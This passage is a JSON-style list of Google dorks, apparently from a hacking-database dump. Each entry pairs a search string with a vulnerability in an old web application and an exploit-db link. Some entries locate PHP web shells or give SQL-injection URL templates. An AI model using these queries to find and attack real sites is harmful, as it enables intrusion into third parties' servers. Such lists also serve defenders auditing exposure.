{"dork": "Powered by WHMCompleteSolution - or inurl:WHMCS", "description": "WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: https://www.exploit-db.com/exploits/12371"}, {"dork": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "description": "Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: https://www.exploit-db.com/exploits/12805"}, {"dork": "\"Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media\"", "description": "Subdreamer Pro v3.0.4 CMS upload Vulnerability: https://www.exploit-db.com/exploits/14101"}, {"dork": "\"Desenvolvido por WeBProdZ\"", "description": "WeBProdZ CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12522"}, {"dork": "inurl:\"inurl:file.php?recordID=\"", "description": "FILE SHARE v1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10497"}, {"dork": "\"Powered by myBusinessAdmin and Red Cow Technologies, Inc.\"", "description": "myBusinessAdmin (content.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11327"}, {"dork": "\"Powered by cityadmin and Red Cow Technologies, Inc.\"", "description": "cityadmin (links.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11326"}, {"dork": "\"Powered by RealAdmin and Red Cow Technologies, Inc.\"", "description": "RealAdmin (detail.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11325"}, {"dork": "mod.php?mod=publisher&op=printarticle&artid=", "description": "eNdonesia 8.4 SQL Injection Vulnerability - CVE: 2010-3461: https://www.exploit-db.com/exploits/15006"}, {"dork": "inurl:\"index.php?option=com_spa\"", "description": "Joomla Component com_spa SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14423"}, {"dork": "inurl:\"photo_album.php?alb_id=\"", "description": "SpireCMS v2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10408"}, {"dork": "intext : \"Website by conceptinternetltd\"", "description": "Concept E-commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14512"}, {"dork": "Powered by PHP Melody 1.5.3", "description": "blog ink Bypass Setting Vulnerability: https://www.exploit-db.com/exploits/11462"}, {"dork": "inurl:\"guestbook.admin.php?action=settings\"", "description": "Jax Guestbook 3.50 Admin Login - CVE: 2009-4447: https://www.exploit-db.com/exploits/10626"}, {"dork": "\"Developed by Bispage.com\"", "description": "bispage Bypass Vulnerability: https://www.exploit-db.com/exploits/11555"}, {"dork": "Script cr\u00e9\u00e9 par Funewik - Dezign-Box \u00a9 France", "description": "Galerie Dezign-Box France Multi Vulnerability: https://www.exploit-db.com/exploits/11523"}, {"dork": "\"by in-link\" or \"Powered by In-Link 2.\"", "description": "In-link 2.3.4 (ADODB_DIR) Remote File Include Vulnerabilities: https://www.exploit-db.com/exploits/2295"}, {"dork": "allintext:\"Latest Pictures\" Name Gender Profile Rating", "description": "Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility - CVE: 2007-3881: https://www.exploit-db.com/exploits/4191"}, {"dork": "inurl:\"noticias.php?notiId=\"", "description": "Ele Medios CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10418"}, {"dork": "Copyright 2008 Free Image & File Hosting", "description": "Free Image & File Hosting Upload Vulnerability: https://www.exploit-db.com/exploits/12105"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "Free PHP photo gallery script Remote File inclusion Vulnerability: https://www.exploit-db.com/exploits/14438"}, {"dork": "\"Send amazing greetings to your friends and relative!\"", "description": "Greeting card SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13983"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "ValidForm Builder script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14454"}, {"dork": "Copyright \u00c2\u00a9 2007 Agares Media. Powered by AMCMS3.", "description": "Arcadem Pro (articlecat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6624"}, {"dork": "inurl:\"lista_articulos.php?id_categoria=\"", "description": "SitioOnline SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10453"}, {"dork": "\"PHPWebAdmin for hMailServer\" intitle:PHPWebAdmin -site:hmailserver.com", "description": "hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/7012"}, {"dork": "Copyright 2010 My Hosting. All rights reserved", "description": "Hosting-php-dynamic (Auth Bypass) Vulnerability: https://www.exploit-db.com/exploits/11968"}, {"dork": "\"PHP Gallery \u00a9 2010 PHP Weby hostgator coupon\"", "description": "Free PHP photo gallery script Remote Command Execution Vulnerability: https://www.exploit-db.com/exploits/14437"}, {"dork": "\"index.php?option=com_chronocontact\" / \"com_chronocontact\"", "description": "Joomla Component ChronoForms (com_chronocontact): https://www.exploit-db.com/exploits/12843"}, {"dork": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "description": "K9 Kreativity Design (pages.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12866"}, {"dork": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "description": "PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: https://www.exploit-db.com/exploits/6425"}, {"dork": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity", "description": "Joomla Component ChronoConnectivity: https://www.exploit-db.com/exploits/12842"}, {"dork": "Powered by cP Creator v2.7.1", "description": "cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: https://www.exploit-db.com/exploits/9726"}, {"dork": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "description": "PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11613"}, {"dork": "Powered by iScripts EasyBiller", "description": "iScripts easybiller v1.1 sqli vulnerability: https://www.exploit-db.com/exploits/13741"}, {"dork": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "description": "phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: https://www.exploit-db.com/exploits/11641"}, {"dork": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "description": "WorldPay Script Shop (productdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10976"}, {"dork": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "description": "Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: https://www.exploit-db.com/exploits/6003/"}, {"dork": "Powered by Discuz! 1.0 \u00a9 2002, Crossday Studio of 11cn.org", "description": "Discuz 1.03 SQL Injection Exploit Vulnerability: https://www.exploit-db.com/exploits/10861"}, {"dork": "Power by donghungx. Copyright \u00a9 2008 AttMp3.com. All rights reserved.", "description": "SongForever.com Clone Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11476"}, {"dork": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "description": "osCMax 2.0 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/11771"}, {"dork": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products Search\" +\"Advanced Search\" + \"All Categories\"", "description": "ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: https://www.exploit-db.com/exploits/7628"}, {"dork": "\"powered by WonderEdit Pro\"", "description": "WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: https://www.exploit-db.com/exploits/1982"}, {"dork": "\"PHP Link Portal v1.95.1 \u00c2\u00a9 Big Resources, Inc.\"", "description": "Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/7644"}, {"dork": "[ Copyright 2005-2006 phpDirectorySource\u00e2\u201e\u00a2, all rights reserved ]", "description": "phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: https://www.exploit-db.com/exploits/9226"}, {"dork": "\"index.php?option=com_sef\" / \"com_sef\"", "description": "Joomla Component Sef (com_sef) - LFI Vulnerability: https://www.exploit-db.com/exploits/14213"}, {"dork": "inurl:.asp? Powered by Comersus ASP Shopping Cart", "description": "Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7259"}, {"dork": "\"Powered by: Yes Solutions\"", "description": "Yes Solutions - Webapp SQL Injection: https://www.exploit-db.com/exploits/11368"}, {"dork": "Powered by PBBoard\u00a9 2009 Version 2.0.5", "description": "PBBoard Version 2.0.5 Mullti Vulnerability: https://www.exploit-db.com/exploits/11570"}, {"dork": "inurl:/components/je-media-player.html?", "description": "Joomla JE Media Player Component LFI Vulnerability: https://www.exploit-db.com/exploits/14060"}, {"dork": "\"Forum Active Bulletin Board version 1.1 b\u00e9ta 2\"", "description": "Active Bulletin Board"}, {"dork": "inurl:module=My_eGallery pid", "description": "MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: https://www.exploit-db.com/exploits/8100"}, {"dork": "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media", "description": "Subdreamer.v3.0.1 cms upload Vulnerability: https://www.exploit-db.com/exploits/11749"}, {"dork": "\"These forums are running on\" \"miniBB\"", "description": "miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: https://www.exploit-db.com/exploits/4587"}, {"dork": "intext:\"Powered by Ramaas Software\"", "description": "Ramaas Software CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12412"}, {"dork": "Powered by Maian Greetings v2.1", "description": "Maian Greetings v2.1 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11301"}, {"dork": "\"Powered by [ iSupport 1.8 ]\"", "description": "iSupport 1.8 XSS/LFI - CVE: 2009-4434: https://www.exploit-db.com/exploits/10478"}, {"dork": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "description": "Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: https://www.exploit-db.com/exploits/2172"}, {"dork": "inurl:index.php?title=gamepage", "description": "PHP Gamepage SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12634"}, {"dork": "Powered by: Maian Uploader v4.0", "description": "Maian Uploader v4.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11571"}, {"dork": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "description": "Powder Blue Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12671"}, {"dork": "\"Powered by MetInfo 2.0\"", "description": "MetInfo 2.0 PHP Code Injection Vulnerability: https://www.exploit-db.com/exploits/15360"}, {"dork": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "description": "Marketing Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12788"}, {"dork": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "description": "eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: https://www.exploit-db.com/exploits/4154"}, {"dork": "\"Developed by Infoware Solutions\"", "description": "infoware SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12714"}, {"dork": "\"Powered by: MyPHP Forum\"", "description": "MyPHP Forum"}, {"dork": "Ayemsis Emlak Pro", "description": "Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7665"}, {"dork": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "description": "crownweb (page.cfm) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11299"}, {"dork": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "description": "Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: https://www.exploit-db.com/exploits/4804"}, {"dork": "inurl:\"contentPage.php?id=\" OR inurl:\"displayResource.php?id=\" AND intext:\"Website by Mile High Creative\"", "description": "MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12792"}, {"dork": "inurl:com_jepoll", "description": "Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12781"}, {"dork": "Come from home Script ( Latest Project ) www.esmart-vision.com", "description": "Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10977"}, {"dork": "\"powered by zomplog\"", "description": "Zomplog"}, {"dork": "Joomla Component com_eportfolio Upload Vulnerability", "description": "WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: https://www.exploit-db.com/exploits/7216"}, {"dork": "\"Site designed and built Powered by GlobalWebTek.\"", "description": "GlobalWebTek Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12761"}, {"dork": "Copyright \u00a92007-2009 by Kasseler CMS. All rights reserved.", "description": "Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability - CVE: 2009-4822: https://www.exploit-db.com/exploits/12402"}, {"dork": "inurl:inc_webblogmanager.asp", "description": "DMXReady Blog Manager"}, {"dork": "Powered by eLitius Version 1.0", "description": "eLitius 1.0 (manage-admin.php) Add Admin/Change Password: https://www.exploit-db.com/exploits/8459"}, {"dork": "inurl:index.php?option=com_races \"raceId\"", "description": "Joomla Component com_races Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11710"}, {"dork": "inurl:/phpplanner/userinfo.php?userid=", "description": "phpplanner XSS / SQL Vulnerability: https://www.exploit-db.com/exploits/13847"}, {"dork": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "description": "PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: https://www.exploit-db.com/exploits/3524"}, {"dork": "\"Powered by ClanAdmin Tools v1.4.2\"", "description": "ClanWeb 1.4.2 Remote Change Password / Add Admin: https://www.exploit-db.com/exploits/8717"}, {"dork": "Powered by osCommerce | Customized by EZ-Oscommerce", "description": "EZ-Oscommerce 3.1 Remote File Upload: https://www.exploit-db.com/exploits/14415"}, {"dork": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "description": "Aim Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12791"}, {"dork": "Powered by One-News", "description": "OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/6292"}, {"dork": "\"Powered by PHP Director\"", "description": "PHPDirector"}, {"dork": "\"Webdesign Cosmos Solutions\"", "description": "Cosmos Solutions cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12793"}, {"dork": "\"Site designed and built by ProWeb Associates.\"", "description": "ProWeb Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12730"}, {"dork": "\"Powered By Basic CMS SweetRice\"", "description": "SweetRice 0.6.4 (fckeditor) Remote File Upload: https://www.exploit-db.com/exploits/14184"}, {"dork": "inurl:index.php?option=com_liveticker \"viewticker\"", "description": "Joomla Component com_liveticker Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11604"}, {"dork": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "description": "Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9460"}, {"dork": "\"Devana is an open source project !\"", "description": "Devana SQL Injection vulnerability - CVE: 2010-2673: https://www.exploit-db.com/exploits/11922"}, {"dork": "\"sitio web dise\u00f1ado por www.toronja.com.pe\"", "description": "toronja cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12770"}, {"dork": "E-Commerce Engine Copyright \u00a9 2005 osCSS", "description": "osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: https://www.exploit-db.com/exploits/12856"}, {"dork": "Powered by Ac4p.com Gallery v1.0 , Copyright\u00a9 2007 ac4p.com", "description": "Ac4p.com Gallery v1.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11519"}, {"dork": "Powered by Digital College 1.0 - Magtrb Soft 2010", "description": "Digital College 1.0 Upload Vulnerability: https://www.exploit-db.com/exploits/12568"}, {"dork": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "description": "Wordpress Plugin e-Commerce"}, {"dork": "intitle:\"igenus webmail login\"", "description": "iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: https://www.exploit-db.com/exploits/1527"}, {"dork": "\"Powered by FreeWebshop\"", "description": "FreeWebshop"}, {"dork": "intext:\"Designed by Spaceacre\"", "description": "Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities: https://www.exploit-db.com/exploits/12746"}, {"dork": "This site is powered by e107, which is released under the terms of the GNU GPL License.", "description": "e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities: https://www.exploit-db.com/exploits/12818"}, {"dork": "\"S-CMS by matteoiamma\"", "description": "S-CMS 2.0b3 Multiple Local File Inclusion Vulnerabilities: https://www.exploit-db.com/exploits/8913"}, {"dork": "inurl:\"cal_day.php?op=day&catview=\"", "description": "Calendarix v0.8.20071118 SQL Injection: https://www.exploit-db.com/exploits/11443"}, {"dork": "netGitar.com - Shop v1.0", "description": "Net Gitar Shopv1.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11016"}, {"dork": "allinurl:fullview.php?tempid=", "description": "Template Seller Pro 3.25 (tempid) Remote SQL Injection: https://www.exploit-db.com/exploits/12360"}, {"dork": "www.stwc-counter.de", "description": "STWC-Counter"}, {"dork": "[ Powered by: RadLance v7.5 ]", "description": "RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: https://www.exploit-db.com/exploits/9195"}, {"dork": "Powered by CMScout (c)2005 CMScout Group", "description": "CMScout 2.08 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12407"}, {"dork": "Powered by Comersus v6 Shopping Cart", "description": "Comersus Shopping Cart v6 Remote User Pass: https://www.exploit-db.com/exploits/7736"}, {"dork": "\"Powered by MobPartner\" inurl:\"chat.php\"", "description": "MobPartner Chat Multiple Sql Injection Vulnerabilities: https://www.exploit-db.com/exploits/11321"}, {"dork": "[ Content Copyright \u00c2\u00a9 2007 RadNics Gold ]", "description": "RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: https://www.exploit-db.com/exploits/9196"}, {"dork": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "description": "iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: https://www.exploit-db.com/exploits/5761"}, {"dork": "inurl:\"/modules/friendfinder/\"", "description": "XOOPS Module Friendfinder"}, {"dork": "allinurl:forum_answer.php?que_id=", "description": "AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: https://www.exploit-db.com/exploits/12372"}, {"dork": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "description": "EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12353"}, {"dork": "\"Copyright 2004 easy-content forums\"", "description": "Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: https://www.exploit-db.com/exploits/1834"}, {"dork": "\"Website by WebSolutions.ca\"", "description": "WsCMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12813"}, {"dork": "\"Powered by Nukedit\"", "description": "Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: https://www.exploit-db.com/exploits/5192"}, {"dork": "Powered by Gbook MX v4.1.0 \u00a92003 Magtrb Soft", "description": "Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: https://www.exploit-db.com/exploits/10986"}, {"dork": "Powered by SLAED CMS \u00a9 2005-2008 SLAED. All rights reserved.", "description": "Slaed CMS v4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11596"}, {"dork": "myAlbum-P 2.0", "description": "XOOPS Module myAlbum-P"}, {"dork": "[ Software Directory Powered by SoftDirec 1.05 ]", "description": "Soft Direct v1.05 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11189"}, {"dork": "\"By Geeklog\" \"Created this page in\" +seconds +powered", "description": "Geeklog v1.6.0sr2 - Remote File Upload: https://www.exploit-db.com/exploits/9855"}, {"dork": "inurl:\"xampp/biorhythm.php\"", "description": "XAMPP 1.7.3 multiple vulnerabilites: https://www.exploit-db.com/exploits/15370"}, {"dork": "inurl:\"/modules/glossaire/\"", "description": "XOOPS Module Glossarie"}, {"dork": "index.php?option=com_is", "description": "Joomla Component is 1.0.1 Multiple Remote SQL Injection: https://www.exploit-db.com/exploits/5995"}, {"dork": "Powered by Ninja Designs This is a port of WordPress", "description": "Ninja Blog v4.8 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10991"}, {"dork": "Copyright 1999-2010 Rocksalt International Pty Ltd. All rights reserved", "description": "VP-ASP Shopping Cart 7.0 DB Download Vulnerability: https://www.exploit-db.com/exploits/11018"}, {"dork": "inurl:\"/modules/wfsection/\"", "description": "https://www.exploit-db.com/exploits/3644/"}, {"dork": "intext:\"phpbb - auction\" inurl:\"auction\"", "description": "Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: https://www.exploit-db.com/exploits/1747"}, {"dork": "Powered by Forums W-Agora", "description": "W-Agora v.4.2.1 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10999"}, {"dork": "intitle:admbook intitle:version filetype:php", "description": "Admbook 1.2.2 (X-Forwarded-For) Remote Command Execution - CVE: 2006-0852: https://www.exploit-db.com/exploits/1512"}, {"dork": "inurl:\"com_icrmbasic\"", "description": "Joomla IRCm Basic SQL Injection: https://www.exploit-db.com/exploits/9812"}, {"dork": "index.php?option=com_mambads", "description": "Mambo Component mambads"}, {"dork": "\"AlumniServer project\"", "description": "AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9019"}, {"dork": "Powered by PHP F1 (Max's Photo Album)", "description": "Max's Photo Album Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11557"}, {"dork": "\"Powered by LightNEasy\"", "description": "LightNEasy 3.1.x Multiple Vulnerabilite: https://www.exploit-db.com/exploits/12322"}, {"dork": "\"The Merchant Project\"", "description": "The Merchant"}, {"dork": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "description": "Apache Tomcat (webdav) Remote File Disclosure: https://www.exploit-db.com/exploits/4552"}, {"dork": "\"Search Projects\" intitle:\"The ultimate project website\"", "description": "Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: https://www.exploit-db.com/exploits/4660"}, {"dork": "Powered by Dodo, Bubo & Misty. Feed us!", "description": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: https://www.exploit-db.com/exploits/11460"}, {"dork": "allinurl:\"shop.htm?shopMGID=\"", "description": "CMS Ignition SQL Injection: https://www.exploit-db.com/exploits/14471"}, {"dork": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "description": "Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/9505"}, {"dork": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "description": "LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: https://www.exploit-db.com/exploits/1874"}, {"dork": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "description": "PmWiki"}, {"dork": "\"Powered by UPB\"", "description": "Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: https://www.exploit-db.com/exploits/2721"}, {"dork": "\"Powered by Claroline\" -demo", "description": "Claroline"}, {"dork": "\"Galerie 3.2 \u00c2\u00a9 2004 by progressive\"", "description": "Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: https://www.exploit-db.com/exploits/6675"}, {"dork": "\"Powered By Pligg\" + \"Legal: License and Source\"", "description": "Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: https://www.exploit-db.com/exploits/6172"}, {"dork": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "description": "toendaCMS 1.0.0 (FCKeditor) Remote File Upload: https://www.exploit-db.com/exploits/2035"}, {"dork": "\"Powered by cpCommerce\"", "description": "cpCommerce"}, {"dork": "\"propuls\u00c3\u00a9 par JBlog\"", "description": "JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: https://www.exploit-db.com/exploits/4211"}, {"dork": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "description": "PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: https://www.exploit-db.com/exploits/1993"}, {"dork": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "description": "Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: https://www.exploit-db.com/exploits/3739"}, {"dork": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "description": "Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: https://www.exploit-db.com/exploits/6428"}, {"dork": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "description": "PHP-Update"}, {"dork": "\"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search", "description": "Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: https://www.exploit-db.com/exploits/1946/"}, {"dork": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "description": "Flatnuke 2.5.8 file() Priv Escalation / Code Execution: https://www.exploit-db.com/exploits/2498"}, {"dork": "\"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hul\u00e1n\"", "description": "BLOG:CMS 4.0.0k Remote SQL Injection - CVE: 2006-3364: https://www.exploit-db.com/exploits/1960"}, {"dork": "\"FlatNuke\" \"Valid HTML 4.01!\" \"Valid CSS!\" \"Get RSS 2.0 Feed\" \"Get RSS", "description": "Flatnuke 2.5.8 (userlang) Local Inclusion / Delete All Users: https://www.exploit-db.com/exploits/2499"}, {"dork": "\"Powered by PHP Photo Album\"", "description": "phpAlbum"}, {"dork": "\"Site powered by GuppY\" | \"Site cr\u00e9\u00e9 avec GuppY\" +inurl:lng=", "description": "GuppY 4.5.16 Remote Commands Execution - CVE: 2007-0639: https://www.exploit-db.com/exploits/3221"}, {"dork": "\"This site is powered by e107\"|inurl:e107_plugins|e107_handlers|e107_files", "description": "e107 0.75 (GLOBALS Overwrite) Remote Code Execution: https://www.exploit-db.com/exploits/2268"}, {"dork": "intext:\"This site is using phpGraphy\" | intitle:\"my phpgraphy site\"", "description": "PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: https://www.exploit-db.com/exploits/2867"}, {"dork": "inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\"", "description": "PHPList 2.10.2 GLOBALS[] Remote Code Execution: https://www.exploit-db.com/exploits/1659"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\"", "description": "SendCard 3.4.0 Unauthorized Administrative Access: https://www.exploit-db.com/exploits/2117"}, {"dork": "\"This is a Free & Open Source mailing list manager\"", "description": "Open Newsletter"}, {"dork": "intitle:\"X7 Chat Help Center\"|\"Powered By X7 Chat\"", "description": "X7 Chat 2.0 (help_file) Remote Commands Execution - CVE: 2006-2156: \nhttps://www.exploit-db.com/exploits/1738"}, {"dork": "SmarterMail Enterprise 7.1", "description": "https://www.exploit-db.com/exploits/15185/"}, {"dork": "(\"powered by nocc\" intitle:\"NOCC Webmail\") -site:sourceforge.net -Zoekinalles.nl -analysis", "description": "NOCC Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891: https://www.exploit-db.com/exploits/1522/"}, {"dork": "inurl:\"?delete\" +intext:\"PHP version\" +intext:\"Safe_mode\"", "description": "Matches some well known phpshells (r57 and the like)."}, {"dork": "inurl:\"?act=phpinfo\"", "description": "Match some well known phpshells (c99 and ironwarez and the like)."}, {"dork": "php Kolay Forum (php KF) \u00a9 2007 - 2010 phpKF Ekibi", "description": "Submitter: FreWaL CSRF Vulnerability: https://www.exploit-db.com/exploits/15685"}, {"dork": "\"Powered by SOOP Portal Raven 1.0b\"", "description": "Submitter: Sun Army - https://www.exploit-db.com/exploits/15703"}, {"dork": "inurl:\"produtos.asp?produto=\"", "description": "Submitter: Br0ly https://www.exploit-db.com/exploits/15776"}, {"dork": "inurl:com_jeauto", "description": "LFI: https://www.exploit-db.com/exploits/15779"}, {"dork": "allinurl:index.php?db=information_schema", "description": "Submitter: modpr0be phpMyAdmin Direct Access to information_schema Database"}, {"dork": "\"Powered by CubeCart 3.0.4\"", "description": "CSRF:https://www.exploit-db.com/exploits/15822"}, {"dork": "\"Website Design by Rocktime\"", "description": "Submitter: n0n0x http://server/product.php?fdProductId=[SQL Injection]"}, {"dork": "\"Powered by UNO.com.my\"", "description": "Submitter: SiKodoQ http://127.0.0.1/[path]/page.php?pid=[SQLi]"}, {"dork": "\"/index.php?id=cmp-noticias\"", "description": "Submitter: xoron http://server/index.php?id=cmp-noticias&n=[SQLi]"}, {"dork": "\"Powered by YourTube v1.0\"", "description": "Author: AtT4CKxT3rR0r1ST CSRF: https://www.exploit-db.com/exploits/15892"}, {"dork": "\"POWERED BY ALITALK\"", "description": "intext:\"POWERED BY ALITALK\""}, {"dork": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "description": "Author: DigiP Multiple Vulnerabilities: https://www.exploit-db.com/exploits/9296/"}, {"dork": 